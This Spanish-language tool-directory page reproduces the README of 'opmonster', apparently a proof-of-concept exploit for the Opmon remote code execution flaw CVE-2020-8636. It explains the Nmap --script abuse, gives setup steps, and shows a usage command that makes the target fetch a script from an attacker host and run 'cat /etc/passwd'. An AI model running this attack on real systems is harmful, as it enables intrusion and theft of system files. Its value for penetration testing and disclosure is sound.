Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
opmonster — CVE-2020-8636 exploit de ejecución remota de código autenticado para Opmon | Kitploit
Herramientas/GitHubGitHub/phor3nsic/opmonster
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 exploit de ejecución remota de código autenticado para Opmon

Ver Repositorio
22hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OpMonster

CVE-2020-8636 — exploit de ejecución remota de código autenticado para Opmon

Acerca de • Instalación • Uso • Licencia

language last commit license stars

OpMonster

Acerca de

OpMonster es un exploit de prueba de concepto para CVE-2020-8636, una vulnerabilidad de ejecución remota de código en la plataforma de monitoreo Opmon. Abusa del endpoint nettools.php, que permite ejecutar Nmap con opciones arbitrarias. El exploit obliga a Opmon a buscar un script malicioso desde un servidor que controlas (mediante ), lo coloca en , luego lo ejecuta para correr tu comando en el objetivo y muestra la salida.

--script
.nse
http-fetch
/tmp

Descubierto y desarrollado por @phor3nsic. Más detalles: Tres CVEs en Opmon.

Instalación

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Uso

Primero, inicia un servidor web en un host al que el objetivo pueda acceder, en un directorio donde el script .nse generado pueda ser descargado (el exploit escribe el script en el directorio actual):

root@kitploit:~
php -S 0.0.0.0:1337

Luego ejecuta el exploit con cuatro argumentos posicionales:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
ArgumentoDescripción
HOSTURL base de Opmon objetivo (ej. https://vulnhost.com)
LHOSTTu host del servidor que sirve el script .nse
LPORTTu puerto del servidor
CMDComando a ejecutar en el objetivo

El exploit aborta con un mensaje si el objetivo no descarga el script ("no vulnerable") o no puede hacer una conexión saliente a tu servidor.

Descargo de responsabilidad

Solo para pruebas de seguridad autorizadas y educación. Eres responsable de cómo lo usas.

Licencia

MIT © phor3nsic

Descargar herramienta